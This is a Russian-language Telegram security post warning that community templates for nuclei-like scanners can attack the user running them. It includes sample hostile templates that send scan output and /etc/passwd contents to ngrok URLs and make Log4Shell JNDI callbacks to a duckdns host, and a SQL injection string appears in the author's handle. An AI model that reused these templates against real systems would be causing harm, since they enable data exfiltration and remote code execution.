TGViewer
Red Fox Security Red Fox Security @redfoxsec · 234 subscribers
Post #25 609

Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)

⚠️ Небезопасные сканеры безопасности

Сегодня речь пойдет про сканеры безопасности. Как неожиданно, но довольно интересно. Обычно, это они же нам помогают искать уязвимости и зарабатывать деньги репутацию на багбаунти.

О каких opensource сканерах мы знаем? Ну... там nuclei, ZAP, может что-то менее известное, например arachni (продались, а движок был интересный, в своё время) или же jaeles, который схож темплейтами с nuclei. А может никому не известный Artemis, да, он тоже работает с темплейтами.

Тёмная сторона сканеров или как ваши таргеты летят другим людям

Вот вроде бы всё замечательно со сканерами работающими на темплейтах. Легко добавлять новые CVE и POC, легко управлять сканированием используя теги. Даже комьюнити развивает и пишет что-то своё для себя и в GitHub. А только ли ради сообщества это делают?

Возможно, но не все. Не одной CVE едины. Стоит вспомнить CVE-2021-21224, которая позволяла получить RCE через темплейт nuclei можете попробовать установив старую версию (исключительно в образовательных целях). Благо с выходом версии nuclei 3.0 code-based можно запускать только с использованием -code и только подписанные. А что с другими сканерами... пока не ясно

А что сейчас могут подсунуть?

👉 SSRF
requests:
- method: GET
path:
- "http://127.0.0.1:1337/flag"
- "http://111111111111.ngrok.io/{{base64(output)}}"
extractors:
- type: regex
name: output
part: body
internal: true


👉 Local File Read
requests:
- method: GET
payloads:
passwd: /etc/passwd
path:
- "https://111111111111.ngrok.io/{{passwd}}"


👉 Перехват Log4shell (реальный пример)
requests:
- raw:
- |+
GET / HTTP/1.1
{{header}}: ${jndi:ldap://labdalab.duckdns.org:4567/a}
payloads:
header:
- User-Agent


Вот и думайте, когда запускаете nuclei-подобные сканеры. Используйте только проверенные, самописные или находящиеся на этапе валидации.

🎁 Ниже представлен инструмент для скачивания легитимных, но пока ещё не валидированных темплейтов (спасибо @reewardiwe).

💻 GitHub - Ссылка

📌

НЕ ИСПОЛЬЗУЙТЕ cent и подобные парсеры гита для обогащения базы.


#redteam
  • 🔥 4
  • ❤ 1
More from @redfoxsec
  1. Apr 27, 2024Привет! Я проводил множество собесов для админов и пентестеров, менторил несколько человек…
  2. Apr 27, 2024Отличная и полезная инициатива, рекомендую для подготовки и самопроверки. Докину еще PR с…
  3. Apr 21, 2024Давненько не постил, но отчасти из-за того, что не было особо интересных вещей о которых м…
  4. Dec 24, 2023📈 Прокачиваем AutoRepeater с Hackvertor Вот и подходит к концу 2023 год, в последние неде…
  5. Dec 2, 2023🔻ZeroQlik + DoubleQlik (CVE-2023-41265, CVE-2023-41266, CVE-2023-48365) Довольно интересн…
  6. Nov 27, 2023🔎 Ищем CVE на GitHub GitHub является одним из лучших источников для свежих уязвимостей, э…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →